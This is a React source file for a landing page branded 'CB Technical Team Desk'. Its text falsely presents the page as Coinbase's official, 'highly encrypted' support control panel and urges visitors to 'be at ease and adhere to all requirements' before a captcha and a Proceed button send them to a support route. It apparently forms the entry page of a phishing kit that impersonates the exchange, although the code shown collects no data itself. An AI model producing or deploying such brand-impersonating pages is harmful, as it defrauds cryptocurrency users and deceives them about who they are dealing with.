import { ArrowForwardIcon } from "@chakra-ui/icons";
import { Box, Button, Center, Circle, Heading, Text, VStack } from "@chakra-ui/react";
import { css, keyframes } from "@emotion/react";
import React, { useEffect } from "react";
import ReCAPTCHA from "react-google-recaptcha";
import { useNavigate } from "react-router-dom";

const moveArrow = keyframes`
0% { transform: translateX(0);}
25% { transform: translateX(5px);}
50% { transform: translateX(-5px);}
75% { transform: translateX(5px);}
100% { transform: translateX(0);}
`;

const sitekey = process.env.REACT_APP_RECAPTCHA_SITE_KEY;



const TeamDesk = () => {
  const navigate = useNavigate();

  const handleClick = () => {
    navigate("/support");
  };
  useEffect(() => {
  const style = document.createElement('style');
  style.innerHTML = `
    ::-webkit-scrollbar {
      width: 8px;
    }
    ::-webkit-scrollbar-track {
      background: #1a202c; /* Chakra's blue.700 */
    }
    ::-webkit-scrollbar-thumb {
      background-color: #2b6cb0; /* Chakra's blue.500 */
      border-radius: 4px;
    }
  `;
  document.head.appendChild(style);
  return () => {
    document.head.removeChild(style);
  };
}, [])


  return (

    <Box minH="100vh" bg="#344afb" display="flex" flexDirection="column"
    overflow='auto'>
      {/* Header Section */}
      <Center py={4} bg="#011082">
        <VStack spacing={4}>
          {/* Logo-like Circle with CB */}
          <Circle size="50px" bg="blue" color="white">
            CB
          </Circle>
          {/* Header Text */}
          <Heading color="white" size="sm" fontWeight={900}>
            CB TECHNICAL TEAM DESK
          </Heading>
        </VStack>
      </Center>

      {/* About Us Section */}
      <Box p={4} flex="1">
        <Heading as="h2" size="md" color="white" mb={6}>
          About Us
        </Heading>
        <Text color="whiteAlpha.800" mb={6}>
        Coinbase Global, Inc., is an American publicly traded company that operates its own crypto exchange platform. Coinbase is a distributed company; all employees operate via remote work. We are the largest cryptocurrency exchange in the United States by trading volume. This is the control panel of the company and it is the most advanced support desk of coinbase, this page is highly encrypted and secure. Be at ease and adhere to all requirements.
        </Text>
<Text color='whiteAlpha.900' mb={2} textAlign='center' fontWeight='900'>
  PLease Verify You Are Not A Robot
</Text>
        {/* reCAPTCHA Component */}
        <Center>
          
        <ReCAPTCHA sitekey={sitekey} style={{ display: 'inline-block' }} />
        </Center>
      </Box>

      {/* Full-width Next Button */}
      <Button
    maxH='2em'
          bgColor="blue"
          minW="100%"
          onClick={handleClick}
          color="white"
          rightIcon={<ArrowForwardIcon boxSize={6} />}
          variant="solid"
          colorScheme="blue"
          position={{ base: "fixed", md: "static" }} // Fixed position on mobile
          bottom={{ base: "0", md: "auto" }} // Position button at the bottom on mobile
          width={{ base: "100%", md: "auto" }} // Full width on mobile
          css={css({
            "&:hover .chakra-icon": {
              animation: `${moveArrow} 0.9s ease`,
            },
          })}
        >
        
         Proceed
        </Button>
      </Box>



    
  );
};

export default TeamDesk;